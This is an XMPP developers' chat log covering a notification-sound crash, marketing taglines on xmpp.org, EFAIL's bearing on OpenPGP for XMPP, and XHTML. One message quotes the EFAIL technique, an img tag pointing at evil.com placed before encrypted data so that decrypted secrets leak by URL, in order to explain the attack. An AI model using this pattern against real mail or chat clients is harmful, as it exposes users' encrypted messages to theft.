-
MattJ
Wow, Swift just crashed my Pulseaudio :)
-
MattJ
and then crashed itself
-
MattJ
Looks like one of my local test accounts had a $large number of offline messages
-
Ge0rG
,oO( https://op-co.de/tmp/chatsecure-crash-iphone.mp4 )
-
MattJ
Nice :)
-
MattJ
It's like winning Solitaire
-
jonasw
what
-
jonasw
how do a lot of offline messages crash pulseaudio.
-
MattJ
jonasw, notification sound. I think it probably tried to play thousands of them at once
-
jonasw
and opening a pulseaudio connection for each, I guess, probably by invoking paplay or something. that makes sense.
-
jonasw
but still a bug in pulse probably :)
-
MattJ
Yeah
-
flow
> jonasw> but still a bug in pulse probably :)
-
flow
not sure if lennart would agree
-
jonasw
AFAIK lennart isn’t involved with pulse anymore
-
Zash
I'm allergic to notification sounds. Probably forever scarred by how annoying that ICQ oh-oh sound got after a while.
-
jonasw
I feel you
-
debacle
Recently I complained about xmpp.org advertising XMPP as "most secure" messaging standard. Some people agreed, that "most secure" is not the most important feature to advertise XMPP with. And some people might even doubt, that XMPP is exceptionally secure :~)
-
debacle
I suggest to replace "most secure" with the word "universal".
-
Zash
Secure in its awesomeness
-
Seve/SouL
Yes
-
Seve/SouL
that's the idea for me
-
debacle
I believe, that the most important aspect of XMPP compared to other, similar technologies is it's "universal" approach. eXtensible for whatever one likes to do, useful for IoT, WebRTC, and social (below on xmpp.org), etc.
-
Seve/SouL
Something that would mean in a way 'the standard'
-
Seve/SouL
I like that
-
daniel
The literal battle tested might also not fly well with some people...
-
Zash
The Standard.
-
Seve/SouL
Yes.
-
Zash
It's probably fine for it to be bold
-
debacle
"Battle-tested" might also be something to change, true.
-
Zash
What was that saying about how to get replies on the Internet? State something wrong. People will flock to correct you.
-
Zash
debacle: That might actually be true in a literal sense.
-
daniel
Zash: that's the problem
-
debacle
Yes, but do you want to use this use case for the ads? :~)
-
debacle
Pacifists or anti-bellicists might go to Matrix then :~)
-
daniel
I mean I personally don't have issues with that. But advertising oneself as the protocol that is used to kill people (albeit indirectly) is probably not the best idea for some target audience
-
debacle
XEPs are lethal in some way...
-
Zash
XEPs don't kill people. People kill people.
-
daniel
That would make for a better slogan
-
Kev
I raised the tagline at the time. It was a deliberate decision by (then) Board.
-
debacle
Back to my complaint: Who could decide over s/most secure/universal/ on xmpp.org? (Or any other change?)
-
Zash
Board?
-
debacle
Maybe also s/Battle-tested./Secure./ :✎ -
debacle
Maybe also s/Battle-tested./Secure./ ? ✏
-
Zash
Why not have bold marketing tho?
-
debacle
Bold?
-
daniel
Not everything that's bold is also good or useful. Advertising Conversations as trusted by ISIS and organized crime might be bold but arguably pretty bad marketing
-
Zash
All publicity is good publicity, as they say
-
debacle
The EFFail was no good marketing, neither for PGP nor EFF.
-
Zash
When everyone has forgotten the details, they might remember "PGP". If so, then it was a success.
-
vanitasvitae
I should read that paper in depth at some point to evaluate its impact on OpenPGP for XMPP.
-
Kev
If people read the details, they'd see it had nothing to do with pgp in the first place :)
-
debacle
The remember "PGP is dangerous, I must uninstall it and replace with Signal"✎ -
debacle
They remember "PGP is dangerous, I must uninstall it and replace with Signal" ✏
-
Zash
vanitasvitae: It wasn't about PGP, it was about MIME and email clients being terrible
-
vanitasvitae
Zash, no, it was also about PGP
-
vanitasvitae
PGP was just harder to attack
-
moparisthebest
not really, it was an HTML thing, you know, like xhmtl-im
-
daniel
If you put xhtml in your ox one could maybe do something similar
-
daniel
Under some conditions
-
daniel
If you implemted both xhtml and your ox in a bad way that is
-
vanitasvitae
daniel, I suspect that XMPP would be vulnerable the same way. You could for example insert references. Or even HTTP-Upload links.
-
vanitasvitae
But I have to evaluate that in more depth
-
Zash
If you put [[<img src="http://evil.com/]] followed by PGP-encrypted data it went and did a HTTP query for evil.com/encrypted-secrets-here
-
daniel
Yeah I think you could deliberately Design and implemted ox in a way that is vulnerable. But I think that might be a bit harder. Because unlike the mime parsers it won't mix different parts of the stanza
-
MattJ
debacle, make a pull request on Github with your proposed change, and I'm sure everything will follow on from there
-
debacle
MattJ, will do, thanks!
-
vanitasvitae
by the look of things, OX puts the stuff that is interpreted as the message payload in an additional element (<signcrypt/> for example), so an attack would be very complicated. Harder than attacking email at least :D
-
Zash
As long as messages are either encrypted or not, it should be fine
-
Wiktor
who would've though using stricter XML instead of lax HTML would prevent some attacks? /s the same style of attack: https://githubengineering.com/githubs-post-csp-journey/
-
Zash
Nah, who cares, kill XHTML
-
Zash
XHTML is dead, long live tag soup!
-
Wiktor
yep, that's the effect of this thinking, move fast break things, and XHTML-2 was claimed to be "bad" because it made people watch green screens of death
-
Zash
Nah, XHTML 2 was bad because it fixed stupid early mistakes in HTML
-
Zash
Like a single <h> instead of <h[1-6]>
-
Wiktor
single <h> is not as easy as it seems: https://jakearchibald.com/2017/do-we-need-a-new-heading-element/
-
Link Mauve
Wiktor, s/green/yellow/ :p
-
Wiktor
Link Mauve: yes, lol, I've imagined yellow but said green, weird
-
moparisthebest
I miss the good old days when I could link people to https://www.moparisthebest.com/no.html and if they opened it in IE it would blue-screen-of-death their computer
-
moparisthebest
because the img width/height were too large of integers...
-
Wiktor
deathpic.png, sounds dangerous
-
Link Mauve
This is scary at so many levels.
-
Link Mauve
Why would parsing an HTML integer trigger a kernel panic.
-
moparisthebest
yea everyone thought it was the image, it wasn't, it's an overflow with the tags :)
-
moparisthebest
Link Mauve, right? :)
-
moparisthebest
I want to say it was vulnerable to windows xp sp1, then sp2 fixed it
-
Ge0rG
"vulnerable to windows xp" - isn't that a problem affecting most PCs produced in the last decade?
-
moparisthebest
are there any XSD wizards in here that could tell me if according to this schema if I can have multiple <Property/> elements with the same type? http://docs.oasis-open.org/xri/xrd/v1.0/xrd-1.0.html#element.property
-
moparisthebest
like <Link bla><Property type="something">data1</Property><Property type="something">data2</Property></Link> ?
-
moparisthebest
http://docs.oasis-open.org/xri/xrd/v1.0/xrd-1.0.html#examples.2 has <Property type="http://spec.example.net/version">1.0</Property><Property type="http://spec.example.net/version">2.0</Property>
-
moparisthebest
so I guess the answer is yes? though what does "XRD Examples (Non-Normative)" mean? :)
-
jonasw
moparisthebest, I’m rather sure that XSD can’t express such things
-
moparisthebest
thanks jonasw , as an aside you've been doing an exceptional job as editor lately
-
jonasw
thanks
-
pep.
only lately, before that it was crap
-
lovetox
:D